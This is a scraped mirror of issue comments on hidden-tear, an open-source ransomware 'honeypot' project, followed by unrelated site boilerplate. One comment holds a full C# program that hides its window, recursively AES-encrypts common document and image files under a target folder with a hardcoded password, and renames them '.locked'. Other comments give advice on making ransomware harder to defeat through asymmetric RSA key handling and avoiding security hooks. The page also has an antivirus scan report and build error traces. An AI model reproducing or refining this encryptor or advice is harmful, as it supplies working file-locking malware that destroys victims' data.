utkusen / hidden-tear Goto Github PK
View Code? Open in Web Editor NEWan open source ransomware honeypot
an open source ransomware honeypot
Turks smell awful.
Microsoft Visual C# 2010 does not compile. Tell me what to compile?
Nothing here
This project makes me cry.
Hello,
Where can we get a copy of the write.php file to test.
Thank you.
Hello,
After building and named it MyThing, using localhost for test, I get the following error.
Unhandled exception has occurred in your application. If you click Continue. the application will ignore this error and attapt to continue, if you lick Que, the applicacion will close immediately.
The remote server returned an error: (404) Not Fround.
See the end of this message for details on invoking
just-in-time (JIT) debugging instead of this dialog box.
************** Exception Text **************
System.Net.WebException: The remote server returned an error: (404) Not Found.
at System.Net.WebClient.DownloadDataInternal(Uri address, WebRequest& request)
at System.Net.WebClient.DownloadString(Uri address)
at System.Net.WebClient.DownloadString(String address)
at hidden_tear.Form1.SendPassword(String password)
at hidden_tear.Form1.startAction()
at hidden_tear.Form1.Form1_Load(Object sender, EventArgs e)
at System.Windows.Forms.Form.OnLoad(EventArgs e)
at System.Windows.Forms.Form.OnCreateControl()
at System.Windows.Forms.Control.CreateControl(Boolean fIgnoreVisible)
at System.Windows.Forms.Control.CreateControl()
at System.Windows.Forms.Control.WmShowWindow(Message& m)
at System.Windows.Forms.Control.WndProc(Message& m)
at System.Windows.Forms.ScrollableControl.WndProc(Message& m)
at System.Windows.Forms.Form.WmShowWindow(Message& m)
at System.Windows.Forms.Form.WndProc(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)
************** Loaded Assemblies **************
mscorlib
Assembly Version: 4.0.0.0
Win32 Version: 4.6.81.0 built by: NETFXREL2
MyThing
Assembly Version: 1.0.0.0
Win32 Version: 1.0.0.0
System.Windows.Forms
Assembly Version: 4.0.0.0
Win32 Version: 4.6.81.0 built by: NETFXREL2
System
Assembly Version: 4.0.0.0
Win32 Version: 4.6.81.0 built by: NETFXREL2
System.Drawing
Assembly Version: 4.0.0.0
Win32 Version: 4.6.81.0 built by: NETFXREL2
System.Configuration
Assembly Version: 4.0.0.0
Win32 Version: 4.6.81.0 built by: NETFXREL2
System.Core
Assembly Version: 4.0.0.0
Win32 Version: 4.6.81.0 built by: NETFXREL2
System.Xml
Assembly Version: 4.0.0.0
Win32 Version: 4.6.81.0 built by: NETFXREL2
************** JIT Debugging **************
To enable just-in-time (JIT) debugging, the .config file for this
application or computer (machine.config) must have the
jitDebugging value set in the system.windows.forms section.
The application must also be compiled with debugging
enabled.
For example:
When JIT debugging is enabled, any unhandled exception
will be sent to the JIT debugger registered on the computer
rather than be handled by this dialog box.
File Name: hidden-tear.exe
File Size: 12 KB
Scan Date: 2015-09-15
Scan Result: 7/35
MD5: 94ce7ab77e933c83410b38e455cd0b91
Verified By NoDistribute: Virus Scan Result
AVG Free:Could be a Trojan horse Cryptic
Avast:MSIL:Ransom-J [Trj]
AntiVir (Avira): Clean
BitDefender: Clean
Clam Antivirus: Clean
COMODO Internet Security: Clean
Dr.Web: Clean
eTrust-Vet: Clean
F-PROT Antivirus: Clean
F-Secure Internet Security: Clean
G Data:MSIL.Trojan-Ransom.Cryptear.A
IKARUS Security: Clean
Kaspersky Antivirus:HEUR:Trojan.Win32.Generic
McAfee:Ransomware-FAL!94CE7AB77E93
MS Security Essentials: Clean
ESET NOD32:Trojan.MSIL/Filecoder.Y
Norman: Clean
Norton Antivirus:Trojan.Cryptolocker.Y
Panda Security: Clean
A-Squared: Clean
Quick Heal Antivirus: Clean
Solo Antivirus: Clean
Sophos: Clean
Trend Micro Internet Security: Clean
VBA32 Antivirus: Clean
Zoner AntiVirus: Clean
Ad-Aware: Clean
BullGuard: Clean
FortiClient: Clean
K7 Ultimate: Clean
NANO Antivirus: Clean
Panda CommandLine: Clean
SUPERAntiSpyware: Clean
Twister Antivirus: Clean
VIPRE: Clean
Could you share on how to build the hidden-tear executable in a video tutorial like the demostration one ?
Very much appreciated.
A
@utkusen, despite the legal warning, I'm not comfortable of using/extending this project without a license.
Do you have the intention of setting this project as open source?
Hey, I wanted to make a cool folder encryptor as a fun project and I then came across hidden-tear
I was trying to encrypt a directory with an inbuilt key. check it out,
using System;
using System.Net;
using System.Diagnostics;
using System.Collections.Generic;
using System.Data;
using System.Drawing;
using System.Linq;
using System.ComponentModel;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Text;
using System.Security;
using System.Security.Cryptography;
using System.IO;
using System.Runtime.InteropServices;
using Microsoft.Win32;
using System.Text.RegularExpressions;
namespace folderlocker
{
public partial class Form1 : Form
{
string dir = "C:\test";
public Form1()
{
InitializeComponent();
}
private void Form1_Load(object sender, EventArgs e)
{
Opacity = 0;
this.ShowInTaskbar = false;
//starts encryption at form load
shebang();
}
private void Form_Shown(object sender, EventArgs e)
{
Visible = false;
Opacity = 100;
}
//AES encryption algorithm
public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes)
{
byte[] encryptedBytes = null;
byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 };
using (MemoryStream ms = new MemoryStream())
{
using (RijndaelManaged AES = new RijndaelManaged())
{
AES.KeySize = 256;
AES.BlockSize = 128;
var key = new Rfc2898DeriveBytes(passwordBytes, saltBytes, 1000);
AES.Key = key.GetBytes(AES.KeySize / 8);
AES.IV = key.GetBytes(AES.BlockSize / 8);
AES.Mode = CipherMode.CBC;
using (var cs = new CryptoStream(ms, AES.CreateEncryptor(), CryptoStreamMode.Write))
{
cs.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length);
cs.Close();
}
encryptedBytes = ms.ToArray();
}
}
return encryptedBytes;
}
//Encrypts single file
public void ef(string file, string password)
{
byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
byte[] passwordBytes = Encoding.UTF8.GetBytes(password);
// Hash the password with SHA256
passwordBytes = SHA256.Create().ComputeHash(passwordBytes);
byte[] bytesEncrypted = AES_Encrypt(bytesToBeEncrypted, passwordBytes);
File.WriteAllBytes(file, bytesEncrypted);
System.IO.File.Move(file, file + ".locked");
}
//encrypts target directory
public void ed(string location, string password)
{
//extensions to be encrypt
var validbroz = new[]
{
".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"
};
string[] files = Directory.GetFiles(location);
string[] childDirectories = Directory.GetDirectories(location);
for (int i = 0; i < files.Length; i++)
{
string extension = Path.GetExtension(files[i]);
if (validbroz.Contains(extension))
{
ef(files[i], password);
}
}
for (int i = 0; i < childDirectories.Length; i++)
{
ed(childDirectories[i], password);
}
}
public void shebang()
{
string password = "loda123";
ed(dir, password);
password = null;
System.Windows.Forms.Application.Exit();
}
}
}
However it doesn't encrypt the test directory, what is going wrong here?
Encrypting using the symmetric codeschema is weak since the program is vulnerable to all kinds of injections and attacks. Since the entire encryption occurs on the client side a virusscanner (of sorts) could easily hook in, even after the event.
Randsomeware like CrytoLocker (one of the most successful crytopvirusses we know so far) take on an entire different approach. They trust on asymmetric encryption, specifically RSA, in which the private key never reaches the client system. This is much more secure since it's only the public key that needs to be exchanged between the parties. Also, you should write directly against the system libraries where needed to prevent hooks from listening in on communication. Supply your own crypto functions or use a open library instead. This all usually leads to a language with a lower abstraction level, for example C/C++.
There is the argument of complexity for these measures, but 'keeping things simple' is something you cannot afford in these areas where basically everything revolves around security. As for the education; this could barely pass as an encryption tool, never less malicious software.
If I understood from the readme it simply encrypts the file using AES, which use symmetric keys. Is just that? Real ransomware use asymmetric schemes so even if the connection is MITM-ed (some corporate proxy which logs even HTTPS requests) or in case of reverse engineering isn't possible to decrypt files.
Of course asymmetric cryptography don't work for large files out-of-box, so you either need to encrypt just part of file, sufficient to make it not utilizable anymore (an ransomware like scheme), or encrypt the AES key using an public key generated in the server (an PGP like scheme) but requires more security in order to avoid the AES key be retrieved without the private key.
I don't understand well C#, so I want to know how it works, in specific: it just encrypts with AES or use one of the schemes above?
Hello,
Where can we get a copy of the write.php file to test.
Thank you.
Just reading the code it appear to me that in case of multiple folders you'll most probably definitely loose the passwords but one. Due to the usage of sendControl variable...
Nice demo though, for wanna-be black/white hats!
xxxxxxx
Just wanted to congratulate you for your file encryption program. I did not understand why you called your file encryption program as ransomware tho.
Also this is just a legit file encryption, if this program without modification, get's caught by any antivirus this is definitely a false/positive.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.